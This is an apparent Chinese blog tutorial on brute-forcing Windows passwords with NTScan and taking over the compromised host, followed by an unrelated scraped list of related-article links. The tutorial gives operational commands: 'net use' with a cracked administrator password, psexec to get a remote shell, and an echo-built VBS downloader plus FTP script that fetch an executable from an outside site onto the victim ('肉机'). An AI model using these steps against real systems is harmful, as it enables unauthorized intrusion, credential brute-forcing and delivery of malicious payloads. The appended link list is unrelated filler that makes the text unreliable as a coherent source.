口令扫描攻击有两种方式

  • 一种是不知道用户名称,猜测性暴力攻击
  • 另一种是通过各种工具或手段收集用户信息,利用收集的信息实施攻击

口令扫描获取用户的账号名称方法

  1. 利用网络工具获取:
    可以利用目标主机的finger命令查询功能获取信息。当使用finger命令时,主机系统会将保存的用户资料(用户名,登陆时间)显示在终端或计算机上

  2. 通过网络获取用户相关信息:
    用户通常使用相同的名字注册电子邮箱、blog即论坛

  3. 获取主机中的习惯性账号:
    习惯性账号主要包括操作系统账号和应用软件账号。在操作系统账号中,又分为windows账号和linux/nuix账号。在linux/nuix操作系统中。用户信息存放在passwd中,口令经过des加密放在shadow中

  4. 通过网络监听得到用户口令

  5. 通过软件获取:
    在获得一定的shell后,可以通过PwBump、LC5、NTCrack、MT、ADUMP等工具获取系统账号命令

使用NTScan扫描Windows口令

前提:用户开启admin$文件共享
运行regedit,进入下面键值:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters,新建AutoShareWks,以及AutoShareServer两个键值,选择REG_DWORD格式,赋值为1HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa新建restrictanonymous,dword,赋值1。然后重启,通过运行CMD命令进入命令行模式,再运行net share,在共享列表中会看到Admin$、C$\IPC$

Windows口令扫描攻击主要针对某个IP地址或者网段进行口令扫描,实质是通过139、445等端口尝试建立连接,利用DOS命令“net use \ipaddress\admin$ “password” /u:user”,只不过是通过程序实现而已

01设置NTScan

运行NTScan,在NTScan中一班指需要设置开始IP地址和结束IP地址,其他设置均采用默认值
如图

(1)如果是在肉机上进行口令扫描,由于语言版本不同,若操作系统不支持响应语言的显示,就有可能显示为乱码,这时只能凭对系统的熟悉程度进行设置。
(2)在NTScan中有IPC、SMB和WMI 3种扫描方式,第一种和第三种扫描口令较为有效,第二种主要用来扫描共享文件。利用IPC$可以与目标主机建立一个空的连接而无需用户名和密码,还可以得到目标主机上的用户列表。SMB(服务器信息块)协议是一种IBM协议,用于在计算机间共享文件、打印机、串口等。SMB协议可以用在因特网的TCP/IP协议之上,也可以用在其他网络协议,如IPX和NetBEUI之上。
(3)WMI(windows管理规范)是windows的一项核心管理技术。作为一种规范和基础结构,通过WMI可以访问、配置、管理和监视几乎所有Windows资源

02执行扫描

在NTScan运行界面单击“开始”按钮

(1)NTScan扫描口令与字典有关,其原理就是使用字典中的口令与实际口令进行对比,如果相同即可建立连接,即爆破成功,破解成功后会在下方显示。
(2)NTScan的字典为NT_pass.dic,用户名为NT_user.dic,可以根据实际情况对字典文件和用户文件的内容进行修改。
(3)NTScan扫描结束后,会在NTScan程序的当前目录下生成一个NTScan.txt文件,该文件用于记录扫描结果。
(4)在NTScan中还有一些辅助功能,如单击“右键”可以执行“cmd”命令,单击左键后可以执行“连接”、“打开远程登录”及“映射网络驱动器”等命令。

03实时控制

在DOS命令提示符下输入net use \\192.168.38.134\ipc$ "win2003luo" /u:administrator命令获取主机的管理员权限

04执行Psexec命令

输入psexec \\192.168.38.134 cmd命令,获取一个DOSShell

安装psexec.exe:将psexec.exe文件放在windows\system32目录下并运行即可

以上两步可以合并。在DOS命令提示符下输入psexec \\192.168.38.134 u administrator -pwin2003luo cmd获取DOS下的shell

05从远端查看被入侵计算机的端口开放情况

使用sfind -p 192.168.38.134命令一次查看远程主机端口开放情况

06上传文件
07查看主机基本信息

代码:systeminfo

说明:

(1)可以使用一下VBS脚本命令上传文件
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo web.responseboby:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe

(2)如果不能通过执行VBS脚本上传文件,可以通过执行FTP命令上传文件
echo open 192.168.1.1 >b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get systeminfo.exe >>b
echo bye >>b
ftp -s:b

(3)上传文件时,建议先使用“dir filename”命令查看文件是否存在,上传后再次通过“dir filename”命令查看文件是否上传成功

Windows系统口令扫描之——使用NTScan扫描Windows口令相关推荐

  1. 免费Windows系统服务器,免费试用人数太多,Windows 365云电脑服务器炸了,官方紧急暂停...

    明敏 发自 凹非寺量子位 报道 | 公众号 QbitAI 没想到! 在上线才第二天,Windows 365云电脑就因为涌入用户太多,不得以暂停了免费试用功能. 今天一早,微软 365官方在推特上宣布了 ...

  2. Windows系统 services.msc命令详解,Windows命令行查看本地服务

    「作者主页」:士别三日wyx 第一步.打开cmd 按下 win 键,输入 cmd 后回车,打开「命令提示符」 第二步.查看系统版本 在打开的cmd窗口中,输入 services.msc 后回车,即可在 ...

  3. 【bat批处理脚本命令】2分钟看懂,一键主机windows系统远程连接控制阿里云等windows系统的云服务器(保姆级图文+实现代码)

    目录 1.实现效果 2.实现代码 3.使用代码新建一个bat脚本文件 总结 欢迎关注 『bat批处理脚本命令』 系列,持续更新中 欢迎关注 『bat批处理脚本命令』 系列,持续更新中 本来阿里云服务器 ...

  4. (三)jenkins+bonobo git server+windows系统自动化部署springboot项目(远程windows自动化部署)

    前提 jenkins安装,参考:(一)jenkins+bonobo git server+windows系统自动化部署springboot项目(jenkins安装) 自动化部署,参考:(二)jenki ...

  5. Windows系统激活问题:在运行Microsoft Windows 非核心版本的计算机上,运行 slui.exe 0x2a 0x803f7001 以显示错误文本 解决方案

    [问题]在运行Microsoft Windows 非核心版本的计算机上,运行 slui.exe 0x2a 0x803f7001 以显示错误文本 [解决方案] 1.开机按下[Win + R],输入:re ...

  6. linux下备份windows系统版本,使用BackupPC备份Linux和Windows系统

    使用BackupPC备份Linux和Windows系统 版本1.0 作者:Falko Timme 本教程将介绍如何使用BackupPC备份Linux和Windows系统. BackupPC充当服务器, ...

  7. github windows系统监控_你需要的:Windows | 精品软件集

    本页主要展示Windows精品软件,同类产品尽量做到只展示一个如有好的软件可在本页底部回复,推荐给其他小伙伴文章目录 1 效率工具类 2 制作处理 3 文本编辑类 4 媒体播放类 5 下载类 6 截图 ...

  8. Windows 系统第三方服务开发者可以借助 WSH (Windows Service Hardening) 机制提高安全性

    Windows服务帐户是特权升级的首选攻击面之一,如果你能够盗用此类帐户,则获得最高特权非常容易,这主要是由于操作系统默认将强大的模拟特权授予服务. 即使Microsoft引入了WSH(Windows ...

  9. windows系统下修改mysql时区_Linux与Windows下修改MySql时区的方法

    mysql> show variables like '%time_zone%'; #查询当前时区+------------------+--------+ | Variable_name | ...

  10. windows系统下的kms服务器_搭建 Windows KMS服务器

    搭建 Windows 的服务器 Windows 版本支持 XP, Win7, Win8, Win8.1, 但是不支持 Win10 . x64 = 64 位版本, x86 = 32 位版本. 为简化命令 ...

最新文章

  1. genisoimage命令用法
  2. ThinkPHP5执行流程分析
  3. c++怎么输入esc_绘制CAD图纸的过程中CAD快捷键失灵了怎么办?
  4. ci框架mysql多条件_CI框架同时连接不同的数据库(或不同表前缀)
  5. VS 2005 不能调试无法找到调试信息 未使用调试信息生成二进制文件
  6. ORA-39095: Dump file space has been exhausted
  7. 5-简单选择排序C实现(递增递减的简单转换)
  8. java file 字典查询_File listFiles
  9. Xamarin 打包生成 Android apk 文件
  10. PHP中的数组(排序)
  11. MCS-51单片机的外部引脚及片外总线
  12. SecureCRT连接不成功彻底解决方案
  13. unsw计算机专业排名,新南威尔士大学UNSW计算机科学Computer Science专业排名第54位(2021年THE世界大学商科排名)...
  14. Pinia——Vue 的存储库
  15. vue改变class内的属性_vue绑定html的class属性的方法
  16. Android电视清理系统应用,【教程】无需root!卸载小米电视/盒子内置应用竟如此简单...
  17. 傅里叶级数及傅里叶变换
  18. oracle sql 动态参数,sql – 具有动态参数的Oracle Lag函数
  19. C++矩阵求转置矩阵
  20. Git版本控制与github使用

热门文章

  1. VBA代码库智能输入提示 VBA代码助手专业版
  2. 马尔可夫链模型的信贷风险分析与预测
  3. DWG文件打开乱码怎么办?
  4. 《论文阅读》D3DLO: DEEP 3D LIDAR ODOMETRY
  5. pygame 键盘操作
  6. 银行业应用系统监控的维度与目标
  7. Vue 技术栈 教你玩坏 v8引擎 吃透 js 内存回收机制
  8. MAC全局安装yarn
  9. ICEM 网格划分技巧(21-5)
  10. xrd连续扫描和步进扫描_XRD简答